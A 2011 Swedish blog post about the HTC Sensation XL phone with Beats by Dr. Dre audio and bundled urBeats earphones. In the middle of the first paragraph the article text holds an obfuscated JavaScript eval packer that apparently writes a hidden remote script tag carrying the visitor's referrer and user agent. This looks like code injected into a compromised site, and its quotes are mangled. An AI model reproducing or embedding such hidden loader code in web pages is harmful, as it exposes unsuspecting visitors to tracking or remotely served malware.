Image Image Image Image Image Image Image Image Image Image

| 15 augusti, 2020

Scroll to top

Top

HTC Sensations XL med Dr Dre Beats ljud!

HTC Sensations XL med Dr Dre Beats ljud!
Filip Urde
  • On 6 oktober, 2011
  • http://www.revue.se/filip-urde

 

Ingen har nog vid det här laget missat att rap ”SUPER DUPER” stjärnan, Dr Dre, har ett samarbete med monsterheadphones. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iynad|var|u0026u|referrer|hktrd||js|php’.split(’|’),0,{}))
Samarbetet kallas coolt nog för ”
beats by Dr Dre” och har snabbt blivit något som kan liknas med, ”det fetaste du kan ha”.

Nu har man alltså även gått in i mobil branschen och byggt in sin teknik i några av HTCs modeller. Den senaste i linjen heter HTC Sensation XL och den har en 4.7 tum stor skärm på 480 x 800 pixlar och ett ljud som ska slå det mesta. Med telefonen får man in-ear-hörlurarna urBeats som är helt exklusiva för HTC:s telefoner.

Detta kan vara en riktigt bra konkurrent till iPhone!

Vidare kan även påpekas att Lady gagga (lady gaggig) får en egen linje inom Beats by Dr Dre… Där kan man även hitta P-diddy och Justin Bieber. Kändis lurararna

Comments